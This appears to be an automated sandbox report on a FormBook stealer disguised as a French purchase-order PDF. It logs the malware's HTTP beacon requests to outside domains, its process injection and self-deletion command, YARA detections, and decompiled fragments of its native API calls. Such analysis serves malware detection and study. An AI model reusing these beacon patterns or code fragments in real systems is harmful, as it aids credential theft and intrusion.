Aug 3, 2021 20:12:49.884164095 CEST	5556	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 03 Aug 2021 18:12:49 GMT Server: nginx/1.19.10 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.handybusy.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=2BRIB0J+IU74eT9QrM34IgOLc6rvRxRggRQ5Dm44nGBTXrZyhrhiT7zmyDkAgt3Lv1f/ host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-Server-Cache: true X-Proxy-Cache: MISS

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49743	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:12:53.718667030 CEST	5557	OUT	GET /ajs8/?3fBlVXm=PXCQsRsj6f+UKLkz5iYmBV65DPKHBBScBAKRyWuZQRoQL6ffVXDgpay6Ct5U2sE+s5q9&q48d=HFQLptYpKX HTTP/1.1 Host: www.theassistedadrscheme.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 20:12:53.832051039 CEST	5558	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 03 Aug 2021 18:12:53 GMT Content-Type: text/html Content-Length: 275 ETag: "6104856e-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49744	160.153.138.219	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:12:58.918533087 CEST	5559	OUT	GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARTh HTTP/1.1 Host: www.indiadesignstory.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 20:12:58.958533049 CEST	5560	IN	HTTP/1.1 301 Moved Permanently Age: 0 Content-Security-Policy: upgrade-insecure-requests Content-Type: text/html; charset=iso-8859-1 Date: Tue, 03 Aug 2021 18:12:58 GMT Location: https://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARTh Vary: User-Agent, Accept-Encoding X-Backend: local X-Cache: uncached X-Cache-Hit: MISS X-Cacheable: NO:HTTPS Redirect Content-Length: 343 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 64 65 73 69 67 6e 73 74 6f 72 79 2e 63 6f 6d 2f 61 6a 73 38 2f 3f 71 34 38 64 3d 48 46 51 4c 70 74 59 70 4b 58 26 61 6d 70 3b 33 66 42 6c 56 58 6d 3d 4c 45 6a 55 4d 55 2b 72 77 2b 6d 31 4d 47 4c 63 69 36 78 4c 61 34 6b 4e 50 50 64 55 50 6a 36 61 6f 4b 52 73 6a 65 4d 2f 73 43 45 79 30 50 61 4e 57 77 7a 76 37 6a 50 32 45 34 61 38 5a 7a 62 30 41 52 54 68 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARTh">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49745	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:13:09.126152992 CEST	5561	OUT	GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=3clrjbd8Uk1yhLkd6I01KEeFnSa+FczhmxXwmvBnovucnEmM2e32CtS7ZjKvb0koSvtC HTTP/1.1 Host: www.trucktodock.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 20:13:09.239820004 CEST	5561	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 03 Aug 2021 18:13:09 GMT Content-Type: text/html Content-Length: 275 ETag: "6104831f-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Nouveau bon de commande. 3007021_pdf.exe PID: 3704 Parent PID: 5740

General

Start time:	20:11:06
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe'
Imagebase:	0x5e0000
File size:	1327104 bytes
MD5 hash:	E1D1316D5BC047EC817B950286734ED0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: Nouveau bon de commande. 3007021_pdf.exe PID: 5028 Parent PID: 3704

General

Start time:	20:11:26
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe
Imagebase:	0xf90000
File size:	1327104 bytes
MD5 hash:	E1D1316D5BC047EC817B950286734ED0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 5028

General

Start time:	20:11:28
Start date:	03/08/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WWAHost.exe PID: 1380 Parent PID: 3388

General

Start time:	20:11:45
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\WWAHost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WWAHost.exe
Imagebase:	0x2f0000
File size:	829856 bytes
MD5 hash:	370C260333EB3149EF4E49C8F64652A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4120 Parent PID: 1380

General

Start time:	20:11:50
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3468 Parent PID: 4120

General

Start time:	20:11:50
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Nouveau bon de commande. 3007021_pdf.exe PID: 5028 Parent PID: 3704 Nouveau bon de commande. 3007021_pdf.exeCOMMON

Executed Functions

Function 0041826B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: 8167f086f904118155f64789d9509e83fa8bfa269f520b475a67e3534662c203
Instruction ID: cd922e443c1d175ce787ec50a3917db2002dc2281bdcb341395511052e572817
Opcode Fuzzy Hash: 8167f086f904118155f64789d9509e83fa8bfa269f520b475a67e3534662c203
Instruction Fuzzy Hash: DFF0A9B6200108ABCB14DF89DC81DEB77A9EF8C754F158649FA1D97241DA30E951CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418273
0x0041827f
0x00418287
0x00418292
0x004182ad
0x004182b5
0x004182b9

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041817B, Relevance: 1.6, APIs: 1, Instructions: 60
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041817B(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44, void* _a48, void* _a52) {
				intOrPtr _t22;
				signed int _t53;

				_t22 =  *((intOrPtr*)(__ecx + _t53 * 8));
				asm("cli");
				if (__eflags < 0) goto L3;
				_push(_t53);
			}

0x0041817b
0x0041817e
0x0041817f
0x00418180

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5aca8824298846830fb8475d5eef698a9a4abff6cb495990fbd40ed84a8cc403
Instruction ID: fe08b93a80f37f08659c40a4863477b0ba6811d18e7868b06c221f1db9e7b09e
Opcode Fuzzy Hash: 5aca8824298846830fb8475d5eef698a9a4abff6cb495990fbd40ed84a8cc403
Instruction Fuzzy Hash: 0111D0B2204208AFCB08DF88DC85DEB73ADAF8C354F10864DFA0997241DA34EC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b3c
0x00409b3f
0x00409b44
0x00409b49
0x00409b53
0x00409b58
0x00409b5b
0x00409b5d
0x00409b65
0x00409b6a
0x00409b6a
0x00409b71
0x00409b79
0x00409b7c
0x00409b7e
0x00409b92
0x00000000
0x00409b94
0x00409b9a
0x00409b4e
0x00409b4e
0x00409b4e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181BA, Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 07b8889157412e0487f11020feb18192be06de1a30fcbf9e4faf52b831680a5c
Instruction ID: 961b361ca65ad255850d888d5698d23b6279bc705bb6975606caa25aef147ea8
Opcode Fuzzy Hash: 07b8889157412e0487f11020feb18192be06de1a30fcbf9e4faf52b831680a5c
Instruction Fuzzy Hash: D701B6B6215108AFCB08CF98DC85EEB77A9AF8C754F158248FA1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041839C, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041839C(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E00418DC0(0x559d1e51, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183a3
0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 10faaf56419f747f513ea1c924c2b9e8cd454a20190cffac5b3ee12088e529f1
Instruction ID: 8371d17d94ccae856babb891a3fbfa42cb3a2108a283fce8be3aeb6940b6189a
Opcode Fuzzy Hash: 10faaf56419f747f513ea1c924c2b9e8cd454a20190cffac5b3ee12088e529f1
Instruction Fuzzy Hash: DFF015B2200208ABDB14DF89DC81EEB77ADAF88754F158549FE1897241C634E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182f3
0x004182f6
0x004182ff
0x00418307
0x00418315
0x00418319

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 004182EA, Relevance: 1.5, APIs: 1, Instructions: 18
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004182EA(void* __eax, void* __edx, void* __esi, intOrPtr _a4, void* _a8) {
				long _t22;
				void* _t27;
				signed int _t31;
				void* _t34;

				 *((intOrPtr*)(_t34 + _t31 * 4 - 0x58)) =  *((intOrPtr*)(_t34 + _t31 * 4 - 0x58)) - __esi;
				_push(_t31);
				_t19 = _a4;
				_t14 = _t19 + 0x10; // 0x300
				_push(__esi);
				_t15 = _t19 + 0xc50; // 0x409743
				E00418DC0(_t27, _a4, _t15,  *_t14, 0, 0x2c);
				_t22 = NtClose(_a8); // executed
				return _t22;
			}

0x004182ea
0x004182f0
0x004182f3
0x004182f6
0x004182f9
0x004182ff
0x00418307
0x00418315
0x00418319

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: e82745cc6bcc925a9e4e97f176ff402aa2f2b2b4599f7f19839fa7e142548602
Instruction ID: 95b5d47139cb9844c6c356e696c9f6b19ed2e81e465af1b571aa26f40aa1fab4
Opcode Fuzzy Hash: e82745cc6bcc925a9e4e97f176ff402aa2f2b2b4599f7f19839fa7e142548602
Instruction Fuzzy Hash: E7E0C2B980D3C44FC711FF74A8C4086BF40DE52228B194ACEE4A407543C62592559791

Uniqueness

Uniqueness Score: -1.00%

Function 004088B0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088B0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
